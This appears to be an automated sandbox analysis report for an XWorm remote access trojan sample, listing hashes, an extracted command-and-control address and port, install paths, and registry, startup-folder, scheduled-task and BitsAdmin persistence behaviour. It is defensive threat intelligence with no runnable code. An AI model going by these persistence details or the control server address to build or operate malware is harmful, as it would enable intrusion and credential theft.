xworm | 62471479442943fbfae666403abfd0ccd02ed6d5be6bca01544cc887ca527c8d

Analysis

max time kernel
315s
max time network
634s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
08-04-2024 16:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

StandLaunchpad.exe
Size

134KB
MD5

313697746f04c39606c3c145f7585973
SHA1

cdf4242e9770e2df7194909c0f6682b7444d65a5
SHA256

62471479442943fbfae666403abfd0ccd02ed6d5be6bca01544cc887ca527c8d
SHA512

e8c7031fb50c04adffde20951c1dc5024651c03200ee119c9979538f34003123969fc2fbb7a31a05fcb94985cf612bc1bb6f33293e7399382c179c3566672b34
SSDEEP

3072:c/+WPWhShsl6gRnP5D4LKLh1T5g4+G0jhL:hnhsghhMLOh1TUjh

Score

10^/10

xworm persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:22671

147.185.221.19:22671

Attributes

Install_directory
%Temp%
install_file
Stand.exe

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Stand.exe	family_xworm
behavioral1/memory/2936-9-0x0000000001090000-0x00000000010AE000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Modifies Installed Components in the registry 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Stand.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Active Setup\Installed Components	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Active Setup\Installed Components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}	Stand.exe

Drops startup file 2 IoCs

Processes:

Stand.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk	Stand.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk	Stand.exe

Executes dropped EXE 64 IoCs

Processes:

Stand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exe

pid	process
2936	Stand.exe
1360	Stand.exe
2420	Stand.exe
576	Stand.exe
2124	Stand.exe
2592	Stand.exe
860	Stand.exe
2384	Stand.exe
804	Stand.exe
1152	Stand.exe
1620	Stand.exe
596	Stand.exe
2684	Stand.exe
1608	Stand.exe
2300	Stand.exe
2216	Stand.exe
696	Stand.exe
2364	Stand.exe
1632	Stand.exe
2116	Stand.exe
1616	Stand.exe
2404	Stand.exe
2780	Stand.exe
1504	Stand.exe
1620	Stand.exe
3036	Stand.exe
1912	Stand.exe
2384	Stand.exe
476	Stand.exe
2984	Stand.exe
2964	Stand.exe
2524	Stand.exe
1100	Stand.exe
1384	Stand.exe
2288	Stand.exe
1296	Stand.exe
1536	Stand.exe
2512	Stand.exe
1572	Stand.exe
2608	Stand.exe
2904	Stand.exe
2648	Stand.exe
2212	Stand.exe
2168	Stand.exe
2056	Stand.exe
1648	Stand.exe
1716	Stand.exe
2420	Stand.exe
1996	Stand.exe
560	Stand.exe
2888	Stand.exe
2652	Stand.exe
2308	Stand.exe
632	Stand.exe
2724	Stand.exe
708	Stand.exe
1944	Stand.exe
2780	Stand.exe
2596	Stand.exe
1596	Stand.exe
1032	Stand.exe
1900	Stand.exe
2804	Stand.exe
2232	Stand.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Stand.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Stand = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Stand.exe"	Stand.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

8 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

332 schtasks.exe

flow	ioc
8	ip-api.com

pid	process
332	schtasks.exe

Download via BitsAdmin 1 TTPs 64 IoCs

dropper

BITS Jobs

T1197

Processes:

bitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exe

pid	process
2512	bitsadmin.exe
2200	bitsadmin.exe
3568
1032	bitsadmin.exe
1964	bitsadmin.exe
2352	bitsadmin.exe
3472	bitsadmin.exe
6296	bitsadmin.exe
5292	bitsadmin.exe
6756	bitsadmin.exe
4252	bitsadmin.exe
1556	bitsadmin.exe
860	bitsadmin.exe
860	bitsadmin.exe
2432	bitsadmin.exe
4544	bitsadmin.exe
3996	bitsadmin.exe
4208	bitsadmin.exe
6276
1588	bitsadmin.exe
332	bitsadmin.exe
1928	bitsadmin.exe
1348	bitsadmin.exe
2860	bitsadmin.exe
1348	bitsadmin.exe
908	bitsadmin.exe
3592	bitsadmin.exe
4584	bitsadmin.exe
2312	bitsadmin.exe
1748	bitsadmin.exe
3872	bitsadmin.exe
5904	bitsadmin.exe
2636	bitsadmin.exe
1668	bitsadmin.exe
2728	bitsadmin.exe
3584	bitsadmin.exe
1940	bitsadmin.exe
2904	bitsadmin.exe
2560	bitsadmin.exe
6616	bitsadmin.exe
2364	bitsadmin.exe
5076	bitsadmin.exe
2544	bitsadmin.exe
2188	bitsadmin.exe
1872	bitsadmin.exe
692	bitsadmin.exe
1236	bitsadmin.exe
5172	bitsadmin.exe
2292	bitsadmin.exe
1692	bitsadmin.exe
6924	bitsadmin.exe
7016	bitsadmin.exe
4768	bitsadmin.exe
3512	bitsadmin.exe
7148	bitsadmin.exe
5976	bitsadmin.exe
1976	bitsadmin.exe
3068	bitsadmin.exe
2492	bitsadmin.exe
2060	bitsadmin.exe
6064	bitsadmin.exe
6892	bitsadmin.exe
2408	bitsadmin.exe
692	bitsadmin.exe

Enumerates system info in registry 2 TTPs 64 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5764 taskkill.exe

pid	process
5764	taskkill.exe

Modifies Control Panel 55 IoCs

evasion

Processes:

Stand.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Appearance\New Schemes\1	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Cursors	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Input Method\Hot Keys\00000071	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Appearance\New Schemes\0\Sizes	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Appearance\New Schemes\1\Sizes\0	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Infrared\IrTranP	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Appearance\New Schemes\3\Sizes	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Input Method	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Appearance\New Schemes\2\Sizes\0	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Appearance\Schemes	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Input Method\Hot Keys\00000104	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Accessibility\AudioDescription	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Accessibility\TimeOut	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Appearance\New Schemes\0	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Appearance\New Schemes\2\Sizes	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Appearance\New Schemes\4	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Input Method\Hot Keys\00000201	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Input Method\Hot Keys\00000011	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Accessibility\MouseKeys	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Appearance\New Schemes\3\Sizes\0	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Infrared\Global	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Appearance\New Schemes	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Desktop	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Infrared	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Input Method\Hot Keys\00000070	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Accessibility\Keyboard Response	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Accessibility\StickyKeys	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Appearance\New Schemes\1\Sizes	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Accessibility\ShowSounds	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Desktop\LanguageConfiguration	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Desktop\MuiCached	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Appearance\New Schemes\4\Sizes	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Desktop\Colors	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Input Method\Hot Keys\00000203	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Appearance\New Schemes\3	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Appearance	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Colors	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Accessibility\ToggleKeys	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Input Method\Hot Keys\00000012	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Accessibility\HighContrast	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Accessibility\Keyboard Preference	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Accessibility\On	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Input Method\Hot Keys\00000010	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Input Method\Hot Keys\00000200	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Accessibility\Blind Access	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Accessibility	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Desktop\WindowMetrics	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Accessibility\SoundSentry	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Input Method\Hot Keys\00000202	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Input Method\Hot Keys	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Appearance\New Schemes\0\Sizes\0	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Appearance\New Schemes\2	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Input Method\Hot Keys\00000072	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Appearance\New Schemes\4\Sizes\0	Stand.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Infrared\File Transfer	Stand.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
